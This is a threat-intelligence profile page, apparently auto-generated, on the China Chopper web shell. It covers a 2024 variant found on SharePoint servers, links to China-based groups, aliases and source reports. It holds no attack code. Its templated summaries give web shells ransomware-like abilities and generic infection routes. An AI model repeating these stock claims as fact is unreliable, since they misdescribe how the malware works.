China Chopper

Malware updated 23 days ago (2024-11-29T13:57:35.710Z)

Download STIX

Preview STIX

China Chopper is a well-known malware that has been used extensively by Chinese-speaking actors, including the BRONZE UNION group. The malware is designed to exploit and damage computer systems, often without the knowledge of the user. It can infiltrate systems through suspicious downloads, emails, or websites, and once inside, it can steal personal information, disrupt operations, or even hold data hostage for ransom. In June 2024, a new variant of China Chopper was detected on a public web server. This discovery was made by researchers at Kaspersky when they noticed recurring alerts in their telemetry for this new variant. The infection was found within the code of several web shells on SharePoint servers, including stylecs.aspx, test.aspx, and stylecss.aspx. The functionality of the new China Chopper variant was similar to previous versions, providing remote access and control over compromised web servers. The malware was likely associated with a VPN used by BRONZE UNION to connect to the China Chopper web shell. Additionally, the Unit 42 researchers noted that the attacks generally paralleled Chinese office hours and employed tools typically used by Chinese APT groups, such as customized versions of Gh0st RAT, PlugX, Htran, and China Chopper itself. Furthermore, the malware contained Mandarin language code comments and debug strings, and multiple C2 servers used Chinese Virtual Service providers, including Cloudie Limited and Zenlayer. The involvement of notorious Chinese malware families like PlugX and China Chopper suggests a connection to China, although direct governmental involvement remains unconfirmed. Diplomatic Specter is another group known to utilize these malware families. Despite the lack of confirmed governmental involvement, the tactics and tools used point towards Chinese actors. The detection of the new China Chopper variant prompted further investigation into other potential threats, such as Tropic Trooper. As China Chopper continues to evolve, organizations need to remain vigilant to protect against this persistent threat.

Description last updated: 2024-11-28T11:44:06.970Z

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.

Alias Description	Votes
BlackMould is a possible alias for China Chopper. BlackMould is a type of malware, specifically a native web shell, that has been observed in use by GALLIUM, a China-aligned intrusion group. This malicious software is designed to exploit and damage computer systems, often infiltrating them through suspicious downloads, emails, or websites without t	2

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Web Shell

Windows

Apt

Malware

Exploit

Webshell

Vpn

Payload

Microsoft

China

Chinese

Exploits

Iis

Regeorg

Remote Code ...

Vulnerability

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Associated Malware

To see the evidence that has resulted in these malware associations, create a free account

Alias Description	Association Type	Votes
The PingPull Malware is associated with China Chopper. PingPull is a malicious software (malware) developed by the Chinese nation-state group known as Alloy Taurus, also referred to as Gallium. The malware is designed to exploit and damage computer systems, with capabilities such as stealing personal information, disrupting operations, or holding data h	Unspecified	3
The ASPXSpy Malware is associated with China Chopper. ASPXSpy is a type of malware, specifically a web shell, that has been used by various threat actors to exploit and damage computer systems. The earliest deployment attempts date back to 2022 when this malicious software was deployed to multiple hosted websites. It's typically installed on vulnerable	Unspecified	3
The PlugX Malware is associated with China Chopper. PlugX is a Remote Access Trojan (RAT) malware known for its stealthy operations and destructive capabilities. It is often used by threat actors to exploit and damage computer systems, steal personal information, disrupt operations, or hold data hostage for ransom. Its deployment has been linked to s	Unspecified	2

Associated Threat Actors

To see the evidence that has resulted in these threatActor associations, create a free account

Alias Description	Association Type	Votes
The HAFNIUM Threat Actor is associated with China Chopper. HAFNIUM, also known as Silk Typhoon, is a threat actor group originating from China that has been involved in several significant cyber-attacks. They have exploited vulnerabilities in Microsoft Exchange Server software and Zoho products, using methods such as web shells for remote access and unconve	Unspecified	2
The Flax Typhoon Threat Actor is associated with China Chopper. Flax Typhoon is a threat actor reportedly linked to China that has been actively targeting Taiwan, as well as other regions globally. This group, also known by aliases such as RedJuliett and Ethereal Panda, has been implicated in cyberespionage activities against critical infrastructure entities, go	Unspecified	2
The GALLIUM Threat Actor is associated with China Chopper. Gallium, also known as Alloy Taurus, is a threat actor group that has been associated with significant cyber-espionage campaigns and is believed to have ties with China. The group has been linked to multiple intrusion sets targeting network devices, including routers and servers. Gallium notably tar	Unspecified	2

Source Document References

Information about the China Chopper Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
Securelist	21 days ago	Malware report for Q3 2024: threat overview
Securelist	24 days ago	Kaspersky report on APT trends in Q3 2024
DARKReading	4 months ago	Chinese 'Tropic Trooper' APT Targets Mideast Governments
Securelist	4 months ago	New malicious web shell from the Tropic Trooper group is found in the Middle East
BankInfoSecurity	7 months ago	Active Chinese Cyberespionage Campaign Rifling Email Servers
DARKReading	7 months ago	China APT Stole Geopolitical Secrets From Middle East, Africa & Asia
Checkpoint	8 months ago	29th April – Threat Intelligence Report - Check Point Research
DARKReading	8 months ago	ToddyCat APT Is Stealing Data on 'Industrial Scale'
CERT-EU	a year ago	Cyber Security Week In Review: January 12, 2024
CERT-EU	a year ago	SecurityScorecard Threat Research : Volt Typhoon Compromises 30% of Cisco RV320/325 Devices in 37 Days – Global Security Mag Online
MITRE	a year ago	Analyzing Attacker Behavior Post-Exploitation of MS Exchange \| Rapid7 Blog
CERT-EU	a year ago	Cyber Security Week in Review: September 29, 2023
CERT-EU	a year ago	China-Linked Budworm Targeting Middle Eastern Telco and Asian Government Agencies
CERT-EU	a year ago	Stealthy APT Gelsemium Seen Targeting Southeast Asian Government
CERT-EU	a year ago	New Report Uncovers 3 Distinct Clusters of China-Nexus Attacks on Southeast Asian Government
Securityaffairs	a year ago	Is Gelsemium APT behind an attack in Southeast Asian Govt?
Unit42	a year ago	Persistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus
Unit42	a year ago	Unit 42 Researchers Discover Multiple Espionage Operations Targeting Southeast Asian Government
CERT-EU	a year ago	My Tea's not cold : an overview of China's cyber threat – Global Security Mag Online
CERT-EU	a year ago	Flax Typhoon Adopts Living-of-the-Land Binaries